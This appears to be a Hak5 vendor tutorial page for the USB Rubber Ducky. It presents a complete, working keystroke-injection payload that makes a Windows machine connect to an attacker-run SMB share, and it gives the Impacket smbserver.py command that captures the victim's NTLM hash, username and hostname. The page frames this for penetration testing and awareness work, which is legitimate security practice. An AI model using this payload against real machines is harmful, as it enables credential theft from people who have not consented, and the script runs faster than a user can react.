Menu
0
    0

    Your Cart is Empty

    Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning podcasts, leading pentest gear, and inclusive community – where all hackers belong.

    PAYLOAD HUB
    Discover creative payloads from the Hak5 community with filtering by device and category.

    PAYLOAD STUDIO
    Unleash your hacking creativity with this full-featured web-based Payload development environment.

    PAYLOAD AWARDS
    Get your payload in front of thousands and enter to win. Nearly $10,000 in annual Hak5 prizes!

    ADVANCED DUCKYSCRIPT COURSE
    Learn directly from the creators! Unlock your creative potential with this comprehensive online course.

    [PAYLOAD] SERIES
    Join Hak5 hosts and collaborators as we dive into the techniques and code that make great payloads!

    Community developed payloads for Hak5 gear are featured and awarded at PayloadHub — a growing library of currated content.

    Unleash your hacking creativity with the online payload editor: PayloadStudio

    Link to your collections, sales and even external links

    Add up to five columns

    Home  / USB Rubber Ducky

    What's the quickest way to steal a Windows password hash?

    Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

    This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.

    Killer Effort:Reward Ratio

    This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB Thumbdrive". 

    The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team. Timestamp, workstation ID, user and even NTLM hash. What's not to love?

    What you'll need

    The Ducky Script

    REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

    That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py

    The Server

    This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is passing its NTLM network hash, along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?

    Rather than using an actual SMB server - we'll want to use Impacket's smbserver.py since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directly. This can be anything really - from tmp /tmp/ to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" /stuff/

    impacket/examples/smbserver.py tmp /tmp/

    Have fun with that one.

    Now of course this payload will work best when you have the listening smb server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)


    Also in USB Rubber Ducky

    Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky
    Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky

    Since the beginning of Keystroke Injection attacks using DuckyScript 1.0, conventional wisdom has been to begin payloads with a 3000 millisecond delay (DELAY 3000). Using DuckyScript 3.0 extensions, this may be reduced to as little as 25 milliseconds!
    Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky
    Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky

    Keystroke reflection exploits the defacto standard keyboard-computer architecture implemented by all IBM-PC compatibles since 1984 and adopted in usb-hid to provide a side-channel exfiltration pathway that impacts nearly all personal computers from the last 4 decades.
    What is the best security awareness payload for the Rubber Ducky?
    What is the best security awareness payload for the Rubber Ducky?

    A two second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.

    Guides

    x